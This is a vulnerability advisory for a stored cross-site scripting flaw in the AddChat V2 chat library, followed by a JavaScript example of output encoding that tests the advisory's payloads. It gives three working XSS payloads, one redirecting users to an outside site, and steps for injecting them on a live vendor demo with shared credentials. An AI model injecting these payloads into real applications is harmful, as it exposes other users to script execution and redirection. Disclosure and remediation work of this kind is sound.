AddChat V2 - Realtime Chat Library v2.2 Stored XSS Injection

2019.06.25
m0ze (RU)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

/*!
* ::- Title: AddChat V2 - Realtime Chat Library v2.2 Stored XSS Injection
* ::- Author: m0ze
* ::- Date: 2019/06/25
* ::- Software: AddChat V2 - Realtime Chat Library v2.2
*/

::- Details & Description -::
~ Weak security measures like bad input field data filtering have been discovered in the «AddChat V2 - Realtime Chat Library». The current version of this web application is 2.2.

::- Demo Website -::
~ https://codecanyon.net/item/addchat-codeigniter-chat-plugin/20462938
~ Frontend: https://addchat.classiebit.com/
~ Backend: https://addchat.classiebit.com/user/login
~ Login & Password: johndoe / johndoe

::- Special Note -::
~ -

::- Google Dork -::
~ -

::- PoC Links -::
~ -

::- PoC [Stored XSS Injection] -::
~ Go to the demo website https://addchat.classiebit.com/user/login and log in with the provided credentials (johndoe / johndoe), then open the chat window by clicking on the «Chat» icon in the bottom right corner. Select any user from the list and use your payload inside the input field, then press the «Send Message» button.
~ Example #1: <img src=https://i.imgur.com/zRm8R9z.gif onload=alert(`m0ze`);>
~ Example #2: <img src=x onerror=window.location.replace('https://m0ze.ru/');>
~ Example #3: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
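The fix for the filtering weakness described above is to encode message text when it is rendered. The following is an added example, not part of the original advisory and not AddChat's code: `renderUnsafe`, `renderSafe` and the message shape are hypothetical, and the concatenation pattern in `renderUnsafe` is an assumption about how a chat bubble might be built.

```javascript
// Added example (not AddChat code): output-encode stored chat text at render time.
// The three message bodies are the advisory's own examples, used as test input.
const PAGE_PAYLOADS = [
  '<img src=https://i.imgur.com/zRm8R9z.gif onload=alert(`m0ze`);>',
  "<img src=x onerror=window.location.replace('https://m0ze.ru/');>",
  '<!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">',
];

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;' };

// Encode every character that can open a tag, close an attribute or start an entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"'`]/g, (ch) => ESCAPES[ch]);
}

// Assumed vulnerable pattern: stored message text concatenated straight into markup.
function renderUnsafe(msg) {
  return `<div class="chat-msg"><b>${msg.from}</b>: ${msg.text}</div>`;
}

// Hardened form: every user-controlled field is encoded on output.
function renderSafe(msg) {
  return `<div class="chat-msg"><b>${escapeHtml(msg.from)}</b>: ${escapeHtml(msg.text)}</div>`;
}

// Regression check: does the rendered bubble contain any element other than
// the wrapper's own <div> and <b>?
function hasInjectedMarkup(html) {
  const allowed = new Set(['<div class="chat-msg">', '<b>', '</b>', '</div>']);
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.some((tag) => !allowed.has(tag));
}

// Run each advisory payload through a renderer and report which ones survive as markup.
function audit(render) {
  return PAGE_PAYLOADS.map((text) => hasInjectedMarkup(render({ from: 'johndoe', text })));
}

console.log('unsafe renderer:', audit(renderUnsafe));
console.log('safe renderer:  ', audit(renderSafe));
```

Encoding belongs at output time in every place stored messages are displayed, including notification previews and admin views, rather than only at the input field.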

References:

https://codecanyon.net/item/addchat-codeigniter-chat-plugin/20462938

